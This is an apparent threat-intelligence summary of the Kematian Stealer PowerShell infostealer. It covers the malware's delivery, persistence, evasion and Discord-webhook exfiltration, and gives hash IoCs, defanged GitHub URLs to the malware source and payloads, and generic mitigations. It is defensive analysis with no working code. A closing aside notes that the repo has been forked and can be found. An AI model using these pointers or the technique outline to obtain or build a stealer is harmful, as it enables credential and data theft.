RESEARCH: Kematian Stealer
This malware is designed to covertly exfiltrate sensitive data from infected systems.. Great- github is hosting more malware. awesome.
Research Summary
The task was to perform a deep and technical analysis of "Kematian Stealer" a newly identified PowerShell-based information-stealing malware. This malware is designed to covertly exfiltrate sensitive data from infected systems. Understanding its tactics, techniques, and procedures (TTPs), indicators of compromise (IoCs), and detection methods is crucial for developing effective defensive strategies.
Findings
Kematian Stealer is a sophisticated and evolving threat that leverages PowerShell scripts to infiltrate and exfiltrate data from Windows systems. It is distributed as an open-source tool on GitHub, making it easily accessible to cybercriminals. The malware is capable of extracting a wide array of sensitive information from various applications, including messaging apps, gaming platforms, VPN services, email clients, FTP clients, password managers, and cryptocurrency wallets. It employs various techniques to maintain persistence, evade detection, and exfiltrate collected data via Discord webhooks.
Tactics, Techniques, and Procedures (TTPs)
-
Initial Access and Execution:
- The malware is typically distributed via spam or phishing emails containing a RAR archive with a loader binary.
- Upon execution, the loader deploys batch and PowerShell scripts designed to collect sensitive user information and download additional malicious binaries.
-
Persistence:
- The malware creates scheduled tasks to ensure persistence, allowing it to execute at system startup with elevated privileges.
- It adds specific directories to the Windows Defender exclusion list to prevent detection.
-
Defense Evasion:
- The scripts are obfuscated to evade detection by security software.
- The malware uses in-memory execution techniques to avoid writing payloads to disk, thereby evading traditional file-based detection methods.
-
Information Collection:
- Kematian Stealer targets a wide range of applications to extract sensitive information, including credentials, session data, and configuration files.
- It captures images using the webcam, screenshots of the desktop, and processes cookie files.
-
Exfiltration:
- The collected data is compressed into a ZIP file and exfiltrated via Discord webhooks.
- The malware deletes temporary files and the executed PowerShell script to minimize evidence.
Indicators of Compromise (IoCs)
-
File Hashes:
- MD5: 736376a77af0a4eb7108ba02d989c137 (RAR Archive)
- MD5: 02f3b7596cff59b0a04fd2b0676bc395 (Loader Binary)
- MD5: D2EA85153D712CCE3EA2ABD1A593A028 (Batch File)
- MD5: A3619B0A3EE7B7138CEFB9F7E896F168 (PowerShell Script)
- MD5: 18b5977b1a59c585f00ed7dca0fa81c9 (Builder)
- MD5: 80CF2D7AE1F3ACC750F2CF454B4832C6 (Kematian.bin)
-
URLs:
- hxxps://github[.]com/KDot227/Powershell-Token-Grabber/releases/download/Fixed_version/main[.]exe
- hxxps://github[.]com/Somali-Devs/Kematian-Stealer/releases/download/Fixed_version/main[.]exe
- hxxps://github[.]com/Somali-Devs/Kematian-Stealer/
- hxxps://github[.]com/Somali-Devs/Kematian-Stealer/releases/download/AutoBuild/main[.]exe
- hxxps://github[.]com/Somali-Devs/Kematian-Stealer/blob/main/frontend-src/main.ps1
- hxxps://raw[.]githubusercontent[.]com/Somali-Devs/Kematian-Stealer/main/frontend-src/blockhosts[.]ps1
- hxxps://github[.]com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/antivm[.]ps1
- hxxps://raw[.]githubusercontent[.]com/Somali-Devs/Kematian-Stealer/main/frontend-src/kematian_shellcode[.]ps1
- hxxps://github[.]com/Somali-Devs/Kematian-Stealer/releases/download/KematianBuild/kematian[.]bin
Mitigation Strategies
-
Endpoint Security:
- Deploy strong endpoint security solutions with advanced threat detection and prevention capabilities.
- Use reputable antivirus and anti-malware software to quickly detect and remove malicious payloads.
-
System Updates:
- Keep operating systems, applications, and security software up to date with regular patches to mitigate known vulnerabilities.
-
Network Segmentation:
- Implement network segmentation to restrict lateral movement, preventing malware from reaching critical assets.
-
Employee Training:
- Conduct comprehensive employee training on recognizing phishing threats and social engineering tactics.
-
Firewall Configuration:
- Configure firewalls to block outbound communication with known malicious IP addresses and domains associated with command-and-control servers.
-
Behavior Monitoring:
- Employ behavior-based monitoring to detect unusual activity patterns, including suspicious processes attempting unauthorized network connections.
-
Application Whitelisting:
- Enforce application whitelisting policies to allow only approved applications, preventing the execution of unauthorized or malicious executables.
-
Network Traffic Monitoring:
- Monitor network traffic for abnormal patterns, such as large data transfers to unfamiliar or suspicious IP addresses.
-
Incident Response Plan:
- Develop a comprehensive incident response plan detailing necessary actions in the event of a malware infection.
-
Regular Backups:
- Implement regular backups of critical data and systems to minimize the impact of ransomware attacks or data loss resulting from malware infections.
-
Least Privilege Principle:
- Follow the principle of least privilege (PoLP) by restricting user permissions to only those necessary for specific roles.
-
Threat Intelligence:
- Stay updated with the latest threat intelligence reports and indicators of compromise related to malware.
References and Citations
- CYFIRMA Report on Kematian Stealer
- PCRisk Removal Guide
- Malware.News Analysis
- GitHub Repository
- AlienVault OTX Report
- Cybersecurity News Article
- Hive Pro Threat Advisory
- Broadcom Security Bulletin
(The GitHub repo has since been 404'd, which doesn't reduce the utility of the research.. it's been forked, you can find it)
Get questions like this? Does it take a chunks out of your day? Would you rather be working on more interesting intelligence tasks? Would you like help with the research?
This baseline report was thoughtfully researched and took 5 minutes.. It's meant to be a rough draft for you to enhance with the unique insights that make you an invaluable analyst. We just did the grunt work..
Did this help you? Forward it to a friend!
(c) 2024 CSIRT Gadgets, LLC
License - CC BY-SA 4.0